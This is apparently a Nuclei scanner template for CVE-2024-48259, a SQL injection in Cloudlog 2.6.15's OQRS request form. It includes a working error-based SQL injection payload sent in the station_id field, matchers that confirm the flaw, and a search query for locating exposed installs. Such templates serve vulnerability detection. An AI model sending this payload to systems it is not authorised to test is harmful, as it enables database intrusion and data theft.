id: CVE-2024-48259

info:
  name: Cloudlog - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.
  reference:
    - https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
    - https://github.com/magicbug/Cloudlog
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48259
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-48259
    epss-score: 0.00863
    epss-percentile: 0.5372
    cwe-id: CWE-89
    cpe: cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magicbug
    product: cloudlog
    fofa-query: "Login - Cloudlog"
  tags: cve,cve2024,cloudlog,sqli,vuln,unauth

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/oqrs/request_form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,md5({{num}}),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "A Database Error Occurred", "{{md5({{num}})}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 500'
        condition: and
# digest: 4b0a004830460221008bbb51c567e2049f2689d63bce0d751c2e8b83d792e20d4a702cb0969ae20ea9022100d3da11a50d64e74828fe101826f2569ebbd4c72db92e2604aa5e40893b417f1b:922c64590222798bb761d5b6d8e72950